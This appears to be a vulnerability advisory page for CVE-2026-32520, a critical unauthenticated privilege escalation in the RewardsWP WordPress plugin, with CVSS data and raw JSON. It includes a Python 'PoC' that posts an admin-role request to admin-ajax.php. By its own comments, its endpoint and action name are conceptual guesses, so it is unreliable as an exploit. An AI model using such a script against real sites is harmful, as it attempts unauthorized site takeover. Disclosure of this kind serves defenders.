Security Vulnerability Report
中文
CVE-2026-32520 CVSS 9.8 CRITICAL

CVE-2026-32520

Published: 2026-03-25 17:17:05
Last Modified: 2026-04-24 16:35:20

Description

Incorrect Privilege Assignment vulnerability in Andrew Munro / AffiliateWP RewardsWP rewardswp allows Privilege Escalation.This issue affects RewardsWP: from n/a through <= 1.0.4.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

RewardsWP <= 1.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Exploit Title: RewardsWP < 1.0.4 - Unauthenticated Privilege Escalation # Date: 2026-03-25 # Exploit Author: Researcher # Vendor Homepage: https://rewardswp.com/ # Software Link: https://wordpress.org/plugins/rewardswp/ # Version: <= 1.0.4 # Tested on: WordPress 6.x import requests def exploit(url): # Target endpoint (example, actual endpoint depends on plugin implementation) target_url = f"{url}/wp-admin/admin-ajax.php" # Payload to escalate privileges (conceptual) payload = { "action": "rewardswp_sensitive_action", "role": "administrator", "user_id": 1 # or target user creation logic } try: response = requests.post(target_url, data=payload) if response.status_code == 200 and "success" in response.text: print(f"[+] Exploit successful! Check {url}/wp-admin") else: print("[-] Exploit failed or target not vulnerable.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": target = "http://localhost" exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32520", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:04.773", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Privilege Assignment vulnerability in Andrew Munro / AffiliateWP RewardsWP rewardswp allows Privilege Escalation.This issue affects RewardsWP: from n/a through <= 1.0.4."}, {"lang": "es", "value": "Vulnerabilidad de Asignación Incorrecta de Privilegios en Andrew Munro / AffiliateWP RewardsWP rewardswp permite la escalada de privilegios. Este problema afecta a RewardsWP: desde n/d hasta &lt;= 1.0.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/rewardswp/vulnerability/wordpress-rewardswp-plugin-1-0-4-privilege-escalation-vulnerability?_s_id=cve", "source": "[email protected]"}]}}